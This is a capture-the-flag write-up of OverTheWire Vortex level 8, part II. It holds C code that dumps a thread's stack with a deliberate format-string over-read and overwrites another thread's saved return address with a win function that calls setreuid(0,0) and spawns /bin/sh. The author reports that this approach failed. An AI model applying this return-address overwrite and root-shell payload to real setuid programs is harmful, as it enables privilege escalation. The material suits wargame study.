Overthewire Vortex Level8, part II

Back to Level8. You can find the analysis of the problem in part I of this writeup. The idea was to overwrite the return address on the thread stack.

I’ve done this experiment on my home machine, so first I turned ASLR off:

echo 0 > /proc/sys/kernel/randomize_va_space 

Let's print out some information about the thread stack. I've used printf without arguments to do the job:

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#define NUM_THREADS     3

/* Returns the caller's frame pointer: right after gcc's "push %ebp; mov %esp,%ebp"
   prologue the word on top of the stack is the caller's saved ebp, so pop/push
   leaves it in %eax, which is also the return register. No explicit return on
   purpose. 32-bit, frame-pointer build only (gcc -m32 -O0 -pthread). */
int getebp() {
    __asm__("pop %eax\npush %eax");
}

void *print_hello(void *threadid) {
   int stack=0x41414141;    /* marker values, easy to spot in the dump */
   int stac2=0x42424242;
   long tid = (long)threadid;
   /* Only the first three conversions have arguments. The 24 extra %08x make
      printf keep reading up the thread's stack (undefined behaviour, used here
      on purpose as a cheap stack dump on a cdecl/32-bit build). */
   printf("thread #%ld! ebp:%p,stack:%p\n"
    "%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|"
    "%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|\n",
    tid, getebp(), &stack);
   pthread_exit(NULL);
}

int main (int argc, char *argv[]) {
    long t;
    pthread_t threads[NUM_THREADS];

    for(t=0; t<NUM_THREADS; t++)
        pthread_create(&threads[t], NULL, print_hello, (void *)t);

    pthread_exit(NULL);   /* let the threads finish; the process exits when they do */
}

The results:

thread #0! ebp:0xf7e3b398,stack:0xf7e3b38c
f7e45e00|00000000|42424242|41414141|f7e3b498|f7ff3ce0|f7e3b498|f7f9d96e|
00000000|f7e3bb70|f7e3bb70|f7e3bb70|f7e3b454|00000000|00000000|00000000|
00000000|00000000|f7e3bb70|00000000|00000000|00000000|00000000|00000000|
thread #1! ebp:0xf763a398,stack:0xf763a38c
00000000|00000001|42424242|41414141|00000000|00000000|f763a498|f7f9d96e|
00000001|f763ab70|f763ab70|f763ab70|f763a454|00000000|00000000|00000000|
00000000|00000000|f763ab70|00000000|00000000|00000000|00000000|00000000|
thread #2! ebp:0xf6e39398,stack:0xf6e3938c
00000000|00000002|42424242|41414141|00000000|00000000|f6e39498|f7f9d96e|
00000002|f6e39b70|f6e39b70|f6e39b70|f6e39454|00000000|00000000|00000000|
00000000|00000000|f6e39b70|00000000|00000000|00000000|00000000|00000000|
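As an added example (mine, not code from the post), the same kind of inspection done through the documented glibc interface instead of printf reading past its arguments: the thread asks for its own stack bounds with pthread_getattr_np, checks that a local variable sits inside them, and reports how far below the top of the mapping that frame is. It assumes Linux/glibc; the names stack_info, inspect_own_stack and thread_stack_info are my own.

```c
#define _GNU_SOURCE                 /* pthread_getattr_np is a GNU extension */
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
/* Declared by <pthread.h> under _GNU_SOURCE; repeated so the block also builds
   when a harness includes system headers before this file's feature macro. */
extern int pthread_getattr_np(pthread_t thread, pthread_attr_t *attr);

/* Filled in by the thread: its stack bounds and where one of its locals sits. */
struct stack_info {
    uintptr_t stack_lo;   /* lowest address of the stack mapping */
    uintptr_t stack_hi;   /* one past the highest address */
    uintptr_t local_addr; /* address of a local in the thread's frame */
    int ok;               /* 1 if local_addr lies inside [stack_lo, stack_hi) */
};

/* Thread body: query its own stack bounds and locate a local variable. */
static void *inspect_own_stack(void *arg) {
    struct stack_info *info = arg;
    volatile int marker = 0x41414141;  /* same role as 'stack' in the dump above */
    pthread_attr_t attr;
    void *addr;
    size_t size;
    if (pthread_getattr_np(pthread_self(), &attr) != 0)
        return NULL;                   /* leaves info->ok == 0 */
    pthread_attr_getstack(&attr, &addr, &size);
    pthread_attr_destroy(&attr);
    info->stack_lo = (uintptr_t)addr;
    info->stack_hi = (uintptr_t)addr + size;
    info->local_addr = (uintptr_t)&marker;
    info->ok = info->local_addr >= info->stack_lo && info->local_addr < info->stack_hi;
    return NULL;
}

/* Create one thread, wait for it, and hand back what it found. */
struct stack_info thread_stack_info(void) {
    struct stack_info info = {0};
    pthread_t th;
    if (pthread_create(&th, NULL, inspect_own_stack, &info) == 0)
        pthread_join(th, NULL);
    return info;
}

int main(void) {
    struct stack_info i = thread_stack_info();
    printf("stack [%#lx,%#lx) local %#lx, %lu bytes below top\n",
           (unsigned long)i.stack_lo, (unsigned long)i.stack_hi,
           (unsigned long)i.local_addr, (unsigned long)(i.stack_hi - i.local_addr));
    return i.ok ? 0 : 1;
}
```

Because every thread's stack is just another mapping in the shared address space, the bounds printed here are exactly what makes a write from one thread into another thread's frame possible in the first place.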

I've created a small C program to do the overwrite. We are trying to replace a return address on the thread's stack with the address of our win function. (I've created a sleep macro so we can log the sleep function calls.)

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define NUM_THREADS     2
/* Log every sleep() call so the timeline is visible in the output.
   (The preprocessor does not re-expand the inner sleep(x).) */
#define sleep(x) {printf("s:%d\n",x); sleep(x); };

void win() {
    printf("WIN\n");
    exit(0);
}

void *print_hello(void *threadid) {
    for(;;) {
        printf("FOR\n");
        sleep(3);
    }
}

int main (int argc, char *argv[]) {
    long t;
    pthread_t threads[NUM_THREADS];

    for(t=0; t<NUM_THREADS; t++)
        pthread_create(&threads[t], NULL, print_hello, (void *)t);

    sleep(1);
    printf("OVERWRITE\n");
    /* ebp of thread #0 taken from the dump above (ASLR off, 32-bit build).
       Fill the 16 words just below it, addr-64 .. addr-4, with &win, hoping
       to hit a saved return address of the sleeping thread. */
    unsigned int addr = 0xf7e3b398;
    for(t=0;t<16;t++)
        *((unsigned int*)addr+t-16)=(unsigned int)&win;
    sleep(5);
    printf("FAIL\n");
    return 0;
}

The results:

FOR
s:3
FOR
s:3
s:1
OVERWRITE
s:5
WIN

OK, it seems to work. Now let's add the "payload".

I’ve added the following two lines to the win function:

  setreuid(0,0);
  execlp("/bin/sh", "bin/sh", NULL);

But a strange thing happened:

FOR
s:3
FOR
s:3
s:1
OVERWRITE
s:5
FOR
s:3
WIN
FAIL
FOR

At the same moment the win function is called, the main thread exits. I've tried to debug it; the setuid call is responsible for this behavior, but I have not found an explanation for this …

Conclusion: this idea doesn't work :-(.

If you are interested in a different kind of solution, you can check badcob's page. You may not understand Korean, but with Google Translate (as I did) you will understand the shellcode as well. He uses mprotect and overwrites the original pthread code with the shellcode.


2 Responses to Overthewire Vortex Level8, part II

  1. badcob says:

    I'm not badcop. 😛

  2. axtaxt says:

    Sorry! Fixed! 🙂
